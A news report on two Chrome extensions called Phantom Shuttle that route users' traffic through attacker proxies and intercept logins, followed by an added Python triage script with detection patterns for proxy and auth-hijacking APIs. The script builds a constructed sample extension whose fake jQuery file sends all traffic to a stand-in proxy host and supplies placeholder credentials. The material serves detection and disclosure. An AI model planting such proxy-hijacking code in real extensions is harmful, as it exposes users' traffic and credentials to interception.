Malicious Extensions In Chrome Web Store Steal User Credentials

Two Chrome extensions in the Web Store named 'Phantom Shuttle' are posing as plugins for a proxy service to hijack user traffic and steal sensitive data.

Both extensions are still present in Chrome's official marketplace at the time of writing and have been active since at least 2017, according to a report from researchers at the Socket supply-chain security platform.

Phantom Shuttle’s target audience is users in China, including foreign trade workers who need to test connectivity from various locations in the country.

Both extensions are published under the same developer name and are promoted as tools that can proxy traffic and test network speed. They are sold on a subscription costing between $1.4 and $13.6.

Socket.dev researchers say that Phantom Shuttle routes all user web traffic through proxies controlled by the threat actor, accessible via hardcoded credentials. The code doing this is prepended to the legitimate jQuery library.

The malicious code hides the hardcoded proxy credentials using a custom character-index encoding scheme. Through a web traffic listener, the extensions can intercept HTTP authentication challenges on every website.

To automatically run user traffic through the attacker's proxies, the malicious extensions dynamically reconfigure Chrome’s proxy settings using an auto-configuration script.

In the default "smarty" mode, the extension routes more than 170 high-value domains through the proxy network, including developer platforms, cloud service consoles, social media sites, and adult content portals.

On the exclusion list are local networks and the command-and-control domain, to avoid disruption and detection.
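The behaviours described above (a PAC script pushed through the browser's proxy settings, a web-request listener that answers HTTP authentication challenges, and hardcoded credentials prepended to a vendored jQuery file) are all things a reviewer can look for statically in an unpacked extension. The following triage script is an added example written for this article, not Socket's tooling or anything from the extensions themselves. It checks `manifest.json` for the Chrome extension permissions that such behaviour requires (`proxy`, `webRequest`, `webRequestAuthProvider`, `<all_urls>`) and searches the bundled JavaScript for the standard Chrome APIs that implement it (`chrome.proxy.settings.set`, the `pac_script` mode, `webRequest.onAuthRequired`, a `FindProxyForURL` function, an `authCredentials` object). The scoring weights, the review threshold, and the two sample extensions it builds in a temporary directory are this example's own assumptions; the sample "malicious" file is constructed to mimic the layout the report describes, not copied from the real extensions.

```python
"""Static triage heuristic for Chrome extensions that reconfigure the proxy and
hook HTTP authentication challenges. Example code for this article; the weights
and threshold are assumptions, not an established scoring scheme."""
import json
import re
import tempfile
from pathlib import Path

# Manifest permissions that proxy hijacking and auth interception need (real
# Chrome permission names; weights are this example's assumption).
SUSPICIOUS_PERMISSIONS = {
    "proxy": 3,
    "webRequest": 2,
    "webRequestAuthProvider": 2,
    "<all_urls>": 1,
}

# Real Chrome extension / PAC API names; weights are this example's assumption.
API_PATTERNS = {
    "proxy_settings_set": (re.compile(r"proxy\.settings\.set\s*\("), 3),
    "pac_script_mode": (re.compile(r"['\"]pac_script['\"]"), 3),
    "on_auth_required": (re.compile(r"webRequest\.onAuthRequired"), 3),
    "find_proxy_for_url": (re.compile(r"function\s+FindProxyForURL"), 2),
    "auth_credentials_object": (re.compile(r"authCredentials\s*:"), 2),
}

# Genuine jQuery builds start with the library's license banner.
JQUERY_HEADER = re.compile(r"^\s*/\*!?\s*jQuery", re.IGNORECASE)
REVIEW_THRESHOLD = 6  # assumption: scores at or above this warrant manual review


def scan_manifest(manifest):
    """Return (finding, weight) pairs for risky permissions in a manifest."""
    perms = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    return [(f"permission:{p}", w) for p, w in SUSPICIOUS_PERMISSIONS.items() if p in perms]


def scan_script(path, text):
    """Return (finding, weight) pairs for suspicious API use in one JS file."""
    findings = [(f"{path.name}:{name}", w)
                for name, (pattern, w) in API_PATTERNS.items() if pattern.search(text)]
    # A file named like jQuery whose first bytes are not jQuery's banner suggests
    # foreign code prepended to a vendored library, as the report describes.
    if "jquery" in path.name.lower() and not JQUERY_HEADER.match(text):
        findings.append((f"{path.name}:non_jquery_prefix", 3))
    return findings


def scan_extension(root):
    """Scan an unpacked extension directory and return a score, findings and verdict."""
    root = Path(root)
    findings = []
    manifest_path = root / "manifest.json"
    if manifest_path.exists():
        findings += scan_manifest(json.loads(manifest_path.read_text(encoding="utf-8")))
    for js in root.rglob("*.js"):
        findings += scan_script(js, js.read_text(encoding="utf-8", errors="replace"))
    score = sum(w for _, w in findings)
    verdict = "review" if score >= REVIEW_THRESHOLD else "low"
    return {"score": score, "findings": sorted(findings), "verdict": verdict}


def build_samples():
    """Write two constructed sample extensions to a temp dir; return (suspicious, benign)."""
    base = Path(tempfile.mkdtemp(prefix="ext-triage-"))
    sus, benign = base / "suspicious", base / "benign"
    for d in (sus, benign):
        d.mkdir()
    # Constructed sample: proxy/auth permissions plus code prepended to "jQuery".
    (sus / "manifest.json").write_text(json.dumps({
        "manifest_version": 3, "name": "constructed sample proxy helper",
        "permissions": ["proxy", "webRequest", "webRequestAuthProvider", "storage"],
        "host_permissions": ["<all_urls>"],
    }), encoding="utf-8")
    (sus / "jquery.min.js").write_text(r"""var cfg = {u: "user-placeholder", p: "pass-placeholder"};
chrome.proxy.settings.set({value: {mode: "pac_script", pacScript: {data:
  "function FindProxyForURL(url, host) { if (isPlainHostName(host)) return 'DIRECT'; return 'PROXY proxy.example.invalid:8080'; }"
}}, scope: "regular"});
chrome.webRequest.onAuthRequired.addListener(function (d) {
  return {authCredentials: {username: cfg.u, password: cfg.p}};
}, {urls: ["<all_urls>"]}, ["blocking"]);
/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors */
""", encoding="utf-8")
    # Constructed benign sample: minimal permissions and an untouched jQuery banner.
    (benign / "manifest.json").write_text(json.dumps({
        "manifest_version": 3, "name": "constructed benign sample", "permissions": ["storage"],
    }), encoding="utf-8")
    (benign / "jquery.min.js").write_text("/*! jQuery v3.6.0 | (c) OpenJS Foundation */\n",
                                          encoding="utf-8")
    (benign / "content.js").write_text("console.log(document.title);\n", encoding="utf-8")
    return sus, benign


if __name__ == "__main__":
    for label, d in zip(("suspicious", "benign"), build_samples()):
        print(label, json.dumps(scan_extension(d), indent=2))
```

The heuristic only says "look here"; legitimate VPN and proxy-management extensions also need the `proxy` permission and may set a PAC script, so the verdict is a prioritisation for human review, not a malware determination. The `non_jquery_prefix` check is the most specific signal for the pattern the report describes, and it is cheap to extend to any vendored library whose genuine banner is known.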

BleepingComputer has contacted Google about the extensions still being present in the Web Store, but a comment wasn't immediately available.

Source: BleepingComputer